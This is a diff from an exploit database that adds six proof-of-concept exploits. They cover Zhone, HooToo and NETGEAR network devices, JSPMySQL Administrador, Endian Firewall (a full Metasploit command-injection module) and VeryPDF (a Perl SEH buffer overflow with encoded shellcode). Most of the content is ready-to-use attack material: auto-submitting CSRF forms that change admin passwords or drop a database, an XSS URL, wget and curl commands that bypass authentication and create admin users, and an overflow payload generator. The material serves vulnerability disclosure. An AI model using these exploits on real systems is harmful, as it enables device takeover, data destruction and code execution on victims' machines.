DB: 2015-09-08

6 new exploits

files.csv

@@ -34389,8 +34389,14 @@ id,file,description,date,author,platform,type,port
 38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
 38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
 38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
+38080,platforms/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps,0
+38081,platforms/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - CSRF Vulnerabilities",2015-09-04,"Ken Smith",hardware,webapps,80
 38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
 38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
 38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
-38090,platforms/php/webapps/38090.txt,"FireEye Appliance Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
+38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0
+38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
+38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
+38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
+38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,"John Page",jsp,webapps,8081

platforms/hardware/webapps/38080.txt

@@ -0,0 +1,157 @@
+Document Title:
+===============
+Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1591
+
+Download: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip
+
+
+Release Date:
+=============
+2015-09-03
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1591
+
+
+Common Vulnerability Scoring System:
+====================================
+8.8
+
+
+Product & Service Introduction:
+===============================
+At Zhone, Bandwidth Changes Everything™ is more than just a tag line. It is our focus, our fundamental belief and philosophy in 
+developing carrier and enterprise-grade fiber access solutions for our customers ensuring bandwidth is never a constraint in the future!
+
+(Copy of the Vendor Homepage: http://www.zhone.com/support/ )
+
+
+Abstract Advisory Information:
+==============================
+An independent vulnerability laboratory researcher discovered multiple remote vulnerabilities in the official Zhone ADSL2+ 4 Port Wireless Bridge & Router (Broadcom).
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-09-03:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Zhone
+Product: Zhone ADSL2+ 4 Port Bridge (Broadcom) & Zhone ADSL2+ 4 Port Router (Broadcom) 6218-I2-xxx - FW: 03.02.20
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+An authentication bypass vulnerability has been discovered in the official in the official Zhone ADSL2+ 4 Port Wireless Bridge & Router (Broadcom).
+The vulnerability allows remote attackers to bypass the authentication procedure to compromise the hardware device or service interface.
+
+The first vulnerability is located in the session validation when processing to request via GET (outside the network) the `pvccfg.cgi`,`dnscfg.cgi` 
+and `password.cgi` files. Thus can results in a reconfiguration by the attacker to compromise the hardware device. 
+
+The second vulnerability is located in the backupsettings.conf file access rights. Remote attackers can easily request via curl the backupsettings 
+of the hardware device. Thus can result in an easy take-over of the hardware device via an information disclosure by accessing the backupsettings.conf.
+
+The security risk of both vulnerabilities are estimated as high with a cvss (common vulnerability scoring system) count of 8.8. Exploitation of the access 
+privilege issue requires no privilege application user account or user interaction. Successful exploitation of the bug results in hardware device compromise.
+
+Request Method(s):
+				[+] GET
+
+Vulnerable Model(s):
+				[+] Zhone ADSL2+ 4 Port Bridge (Broadcom)
+				[+] Zhone ADSL2+ 4 Port Router (Broadcom)
+
+Affected Firmware:
+				[+] 03.02.20
+
+Product Name:
+				[+] 6218-I2-xxx
+
+
+Proof of Concept (PoC):
+=======================
+The vulnerabilities can be exploited by remote attackers without privilege device user account or user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: #1 
+http://[LOCALHOST]:?/pvccfg.cgi
+http://[LOCALHOST]:?/dnscfg.cgi
+http://[LOCALHOST]:?/password.cgi  (In addition to text storage of sensitive information!)
+
+Note: The links above can be accessed without any authentication in the interface!
+
+
+PoC: #2
+curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" ("dXNlcjp1c2Vy" = "user:user" in base64)
+
+Note: Obtaining backup DSL router configurations by an users account authentication!
+
+
+Security Risk:
+==============
+The security risk of the both vulnerabilities in the bridge and wireless router interface is estimated as high. (CVSS 8.8)
+
+
+Credits & Authors:
+==================
+Mahmoud Khaled - [mahmoud_khld@yahoo.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+

platforms/hardware/webapps/38081.txt

@@ -0,0 +1,87 @@
+# Exploit Title: HooToo Tripmate HT-TM01 Cross Site Request Forgery
+# Date: 03Sep15
+# Exploit Author: Ken Smith
+# Contact: https://twitter.com/P4tchw0rk
+# Vendor Homepage: http://www.hootoo.com
+# Version: HT-TM01, version 2.000.022
+
+1. Description
+Various functions in the device's admin web portal are vulnerable to Cross
+Site Request Forgery. Proof-of-concept HTML has been provided. In order for
+changes in wireless settings/security (executed via CSRF) to apply, a save
+and reset must be execute either by the admin manually saving the settings
+through the portal or via the save and reset CSRF-vulnerable functions
+described below.
+
+2. Proof of Concept
+Change the device's hostname
+<form action="
+http://10.10.10.254/protocol.csp?fname=system&opt=host&function=set"
+method="POST">
+<input type="hidden" name="name" value="CSRF123" />
+<input type="submit" value="Submit request" />
+</form>
+
+Change the region
+<form action="
+http://10.10.10.254/protocol.csp?fname=net&opt=wifi_channel_region&function=set"
+method="POST">
+<input type="hidden" name="country" value="England" />
+<input type="submit" value="Submit request" />
+</form>
+
+Log the admin user out
+<form action="http://10.10.10.254/index.csp?fname=logout" method="POST">
+<input type="submit" value="Submit request" />
+</form>
+
+Change the admin portal password
+<form action="http://10.10.10.254/protocol.csp?fname=security&function=set"
+method="POST">
+<input type="hidden" name="name" value="admin" />
+<input type="hidden" name="opt" value="pwdmod" />
+<input type="hidden" name="pwd1" value="newpass" />
+<input type="hidden" name="pwd2" value="newpass" />
+<input type="submit" value="Submit request" />
+</form>
+
+Reboot the device
+<form action="http://10.10.10.254/protocol.csp">
+<input type="hidden" name="fname" value="system" />
+<input type="hidden" name="opt" value="setting" />
+<input type="hidden" name="action" value="reboot" />
+<input type="hidden" name="function" value="set" />
+<input type="hidden" name="r" value="0&#46;24464550580450606" />
+<input type="submit" value="Submit request" />
+</form>
+
+Save changed settings
+<form action="http://10.10.10.254/protocol.csp">
+<input type="hidden" name="fname" value="storage" />
+<input type="hidden" name="opt" value="listen&#95;disk" />
+<input type="hidden" name="function" value="get" />
+<input type="submit" value="Submit request" />
+</form>
+
+Change WiFi Security
+<form action="
+http://10.10.10.254/protocol.csp?fname=net&opt=wifi_ap&function=set"
+method="POST">
+<input type="hidden" name="mode" value="4" />
+<input type="hidden" name="channel" value="1" />
+<input type="hidden" name="security" value="4" />
+<input type="hidden" name="hide&#95;ssid" value="0" />
+<input type="hidden" name="HTBSSCoexistence" value="0" />
+<input type="hidden" name="SSID" value="CSRF" />
+<input type="hidden" name="passwd" value="Different&#45;password" />
+<input type="submit" value="Submit request" />
+</form>
+
+Change network information
+<form action="
+http://10.10.10.254/protocol.csp?fname=net&opt=wifi_lan_ip&function=set"
+method="POST">
+<input type="hidden" name="ip" value="10&#46;10&#46;10&#46;123" />
+<input type="hidden" name="mask" value="255&#46;255&#46;255&#46;0" />
+<input type="submit" value="Submit request" />
+</form>

platforms/hardware/webapps/38097.txt

@@ -0,0 +1,105 @@
+NETGEAR Wireless Management System - Authentication Bypass and
+Privilege Escalation.
+WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15
+(Build 1236).
+
+
+[-] Vulnerability Information:
+==============================
+Title: NETGEAR Wireless Management System - Authentication Bypass and
+Privilege Escalation
+CVE: Not assigned
+Vendor: NETGEAR
+Product: WMS5316 ProSafe 16AP Wireless Management System
+Affected Version: Firmware 2.1.4.15 (Build 1236)
+Fixed Version: Not publicly available
+
+
+[-] Disclosure Timeline:
+========================
+22/04/2015
+Vulnerability identified by Reinforce Services
+
+23/04/2015
+Support case created with NETGEAR.
+
+24/04/2015
+Vendor requested further information.
+
+27/04/2015
+Issue escalated within NETGEAR.
+
+30/04/2015
+Issue confirmed by vendor.
+
+18/05/2015
+Vendor confirmed issue present in other controllers (details unknown)
+Beta update for WMS5316 expected first week of June.
+
+06/25/2015
+Vendor releases firmware version 2.1.5 that now contains a fix.
+http://downloadcenter.netgear.com/en/product/WMS5316#
+http://kb.netgear.com/app/answers/detail/a_id/29339
+(Note: This has not been tested to confirm the issue is resolved)
+
+
+[-] Proof of Concept:
+=================
+wget --keep-session-cookies --save-cookies=cookies.txt
+--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
+http://192.168.1.2/login_handler.php && wget
+--load-cookies=cookies.txt
+--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
+http://192.168.1.2/request_handler.php
+
+
+[-] Vulnerability Details:
+==========================
+The process to bypass authentication and escalate privileges is as follows:
+
+One:
+Include the "&" symbol anywhere in the password value in the login
+request (as raw content - it must not be encoded).
+
+Two:
+After a moment, the system will accept those credentials and grant
+access to the GUI. The account appears somewhat restricted - but this
+is only client side.
+
+Three:
+Send a request to add a new administrative user.
+
+Four:
+The new admin account is then available for use as created above.
+
+Note: As an alternative, it is trivial to modify the Java code on it's
+way down to a browser to enable all of the admin functions rather than
+creating a new user.
+This worked as well - so it's not strictly necessary to create a new
+user; the bypass 'user' has full admin access if needed (leaving less
+indicators of compromise)
+
+
+[-] Credits:
+============
+Vulnerability discovered by Elliott Lewis of Reinforce Services
+
+
+[-] Copyright:
+==============
+Copyright (c) Reinforce Services Limited 2015, All rights reserved
+worldwide. Permission is hereby granted for the electronic
+redistribution of this information. It is not to be edited or altered
+in any way without the express written consent of Reinforce Services
+Limited.
+
+
+[-] Disclaimer:
+===============
+The information herein contained may change without notice. Use of
+this information constitutes acceptance for use in an AS IS condition.
+There are NO warranties, implied or otherwise, with regard to this
+information or its use. Any use of this information is at the user's
+risk. In no event shall the author/distributor (Reinforce Services
+Limited) be held liable for any damages whatsoever arising out of or
+in connection with the use or spread of this information.

platforms/jsp/webapps/38098.txt

@@ -0,0 +1,142 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt
+
+
+
+Vendor:
+================================
+JSPMySQL Administrador
+https://sites.google.com/site/mfpledon/producao-de-software
+
+
+
+Product:
+================================
+JSPMySQL Administrador v.1 is a remote administration of MySQL databases
+that are on a Web server using JSP technology
+
+
+Vulnerability Type:
+===================
+CSRF & XSS
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+
+Vulnerability Details:
+=====================
+
+1) No CSRF token exists allowing remote attackers to run arbitrary SQL
+commands
+on the MySQL database.
+
+2) XSS entry point exists on the listaBD2.jsp web page opening up the
+application
+for client side browser code execution.
+
+In either case get victim to visit our malicious webpage or click on our
+malicious linx then KABOOOOOOOOOOOOOOOOOOOOOOM!!!
+
+
+
+
+Exploit code(s):
+===============
+
+1- CSRF to drop the default MySQL database on the remote server:
+----------------------------------------------------------------
+
+<!DOCTYPE>
+<html>
+<head>
+<title>JSP-MYSQL-ADMIN-CSRF</title>
+
+<body onLoad="doit()">
+
+<script>
+function doit(){
+var e=document.getElementById('HELL')
+e.submit()
+}
+
+<!-- CSRF DROP MYSQL DATABASE -->
+
+<form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp"
+method="post">
+<input type="text" name="cmd" value="DROP DATABASE mysql"/>
+<input type="text" name="btncmd" value="Enviar" />
+<input type="text" name="bd" value="mysql" />
+</form>
+
+
+
+2- XSS client side code execution delivered to the victim:
+----------------------------------------------------------
+
+http://localhost:8081/sys/sys/listaBD2.jsp?bd=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E
+
+
+
+
+
+Disclosure Timeline:
+=========================================================
+
+
+Vendor Notification:  August 31, 2015
+September 4, 2015  : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+
+Request Method(s):              [+] POST & GET
+
+
+Vulnerable Product:             [+] JSPMySQL Administrador v.1
+
+
+Vulnerable Parameter(s):        [+] cmd, bd
+
+
+Affected Area(s):               [+] listaBD2.jsp
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx

platforms/linux/remote/38096.rb

@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Endian Firewall Proxy Password Change Command Injection',
+      'Description' => %q{
+        This module exploits an OS command injection vulnerability in a
+        web-accessible CGI script used to change passwords for locally-defined
+        proxy user accounts. Valid credentials for such an account are
+        required.
+
+        Command execution will be in the context of the "nobody" account, but
+        this account had broad sudo permissions, including to run the script
+        /usr/local/bin/chrootpasswd (which changes the password for the Linux
+        root account on the system to the value specified by console input
+        once it is executed).
+
+        The password for the proxy user account specified will *not* be
+        changed by the use of this module, as long as the target system is
+        vulnerable to the exploit.
+
+        Very early versions of Endian Firewall (e.g. 1.1 RC5) require
+        HTTP basic auth credentials as well to exploit this vulnerability.
+        Use the USERNAME and PASSWORD advanced options to specify these values
+        if required.
+
+        Versions >= 3.0.0 still contain the vulnerable code, but it appears to
+        never be executed due to a bug in the vulnerable CGI script which also
+        prevents normal use (http://jira.endian.com/browse/UTM-1002).
+
+        Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
+        (http://bugs.endian.com/print_bug_page.php?bug_id=3083).
+
+        Tested successfully against the following versions of EFW Community:
+
+        1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.
+
+        Should function against any version from 1.1 RC5 to 2.2.x, as well as
+        2.4.1 and 2.5.x.
+      },
+      'Author' => [
+        'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
+      ],
+      'References' => [
+        ['CVE', '2015-5082'],
+        ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
+        ['EDB', '37426'],
+        ['EDB', '37428']
+      ],
+      'Privileged'  => false,
+      'Platform'    => %w{ linux },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d",
+          'DisableNops' => true,
+          'Space'       => 2048
+        },
+      'Targets'        =>
+        [
+          [ 'Linux x86',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ],
+          [ 'Linux x86_64',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86_64,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'RPORT' => 10443
+        },
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jun 28 2015',
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
+        '/cgi-bin/chpasswd.cgi']),
+      OptString.new('EFW_USERNAME', [true,
+        'Valid proxy account username for the target system']),
+      OptString.new('EFW_PASSWORD', [true,
+        'Valid password for the proxy user account']),
+      OptString.new('RPATH', [true,
+        'Target PATH for binaries used by the CmdStager', '/bin'])
+     ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
+      ], self.class)
+
+  end
+
+  def exploit
+    # Cannot use generic/shell_reverse_tcp inside an elf
+    # Checking before proceeds
+    if generate_payload_exe.blank?
+      fail_with(Failure::BadConfig,
+        "#{peer} - Failed to store payload inside executable, " +
+        "please select a native payload")
+    end
+
+    execute_cmdstager(:linemax => 200, :nodelete => true)
+  end
+
+  def execute_command(cmd, opts)
+    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+
+    req(cmd)
+  end
+
+  def req(cmd)
+    sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('change', nil, nil, 'form-data; name="ACTION"')
+    post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"')
+    post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"')
+    post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"')
+    post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"')
+    post_data.add_part('  Change password', nil, nil, 'form-data; name="SUBMIT"')
+
+    data = post_data.to_s
+    boundary = post_data.bound
+
+    referer_url =
+      "https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
+      "#{datastore['TARGETURI']}"
+
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => datastore['TARGETURI'],
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'headers' => {
+          'Referer' => referer_url
+        },
+        'data' => data
+      })
+
+     if res
+       if res.code == 401
+         fail_with(Failure::NoAccess,
+           "#{rhost}:#{rport} - Received a 401 HTTP response - " +
+           "specify web admin credentials using the USERNAME " +
+           "and PASSWORD advanced options to target this host.")
+       end
+       if res.code == 404
+         fail_with(Failure::Unreachable,
+           "#{rhost}:#{rport} - Received a 404 HTTP response - " +
+           "your TARGETURI value is most likely not correct")
+       end
+     end
+
+  end
+
+end

platforms/windows/local/38095.pl

@@ -0,0 +1,66 @@
+#*************************************************************************************************************
+# 
+# Exploit Title: VeryPDF HTML Converter v2.0 SEH/ToLower() Bypass Buffer Overflow
+# Date: 9-6-2015
+# Target tested: Windows 7 (x86/x64)
+# Software Link: http://www.verypdf.com/htmltools/winhtmltools.exe
+# Exploit Author: Robbie Corley
+# Contact: c0d3rc0rl3y@gmail.com
+# Website: 
+# CVE: 
+# Category: Local Exploit
+#
+# Description:
+# The [ADD URL] feature is vulnerable to an SEH based buffer overflow.  
+# This can be exploited by constructing a payload of ascii characters that contain our payload
+# and pasting it into the textbox.  The program's textbox converts ALL pasted data to lowercase so I
+# took advantage of the wonderful Alpha3 tool to encode the shellcode into a numerical format to bypass the filter.
+# 
+# I also used a null terminated SEH address to gain universal exploitation across all current Windows OSes.
+# So, I took a rather unconventional approach and placed the shellcode in the buffer itself since it could
+# not execute after the buffer (after SEH) due to the null byte cutting off the remaining pieces of the string.
+#
+# Instructions:  
+# Run this exploit as-is, open the created 'sploitit.txt' file, copy and paste into the [ADD URL] textbox 
+# Hit [OK] and enjoy your soon-to-follow messagebox!
+#
+#**************************************************************************************************************
+
+# placing shellcode in top of buffer padding since we have a null terminated string
+$zero = pack("C*", 0xD);
+my $buff = "\x90" x 2700; #NSEH is at 3704.  we start low to give room for everything else.
+my $seh = "\x05\x25\x40".$zero;
+$nseh = "\xeb\xe1\x90\x90";  # jump backwards to shellcode ;)
+$filler="\x90" x 122;
+
+#0018E924   66:05 9903       ADD AX,399
+#0018E928   04 29            ADD AX,29
+#0018E92A   04 03            ADD AX,3
+#10 bytes
+$encodersetup="\x66\x05\x99\x03\x04\x24\x04\x10";
+$encodersetup .= "\x8b\xc8";
+
+#python ALPHA3.py x86 lowercase ECX --input="c:\shellmsg.bin"
+#Windows MessageBox contructed using Metasploit & Alpha3
+#637 bytes
+$shellcode=
+"j314d34djq34djk34d1411q11q7j314d34dj234dkmq502dq5o0d15upj98xmfod68kfnen488m56kj4".
+"0ek53knd00192g0dl428l0okn5503cnk6b5bm844nb4k5x70o0mkoc60l9l03c3fje7embj4k9lx1x9k".
+"10j2j2ngne63og74ob708do87cm3jxm9o3j05x0k628x50910b8e5049o84e01oxk39d5841k8jej8kk".
+"nxo4ogo5l07129215f7f3fo0989459kxnb2b78jg5gn8m4l21e6g823x5x680c4b91n0ox1370n0l1l4".
+"10jfmk941b9f1k09n57g281gk414nb4kle92542994293e1dnf224e7b920g0b7go3735cm87f0d4c8f".
+"9d1d3c3b24obn8ob498k1d0e7bke846elc507594jb2xjb9e6d3g8b7gl9459819jclb5b9bjg1cn935".
+"6x7x8x7844oe231809742494ndo43d040cn13fmb43k0611f0952kk3g32l54fkd0b6xm15xjkj3636k".
+"nb9e1dj2n16e3b9565lk6f2bmb7b5e0c0d29l13ekbk94842kd51n17d327000803223ncm9101gl";
+
+$smallpads = "\x90" x 347; 
+
+##section 2 | total 10 bytes
+##Perform a long jump backwards up the stack to reach our payload ;)
+$jumpcode="\x8B\xC1\x90\x90"; #MOV EAX,ECX
+$jumpcode .= "\x66\x05\x55\x05"; # ADD AX,555 --> We do AX so we don't have to worry about NULLS ;)
+$jumpcode .= "\xFF\xe0"; #JMP EAX
+
+open(myfile,'>sploitit.txt');
+print myfile $buff.$encodersetup.$shellcode.$smallpads.$jumpcode.$nseh.$seh;
+close (myfile);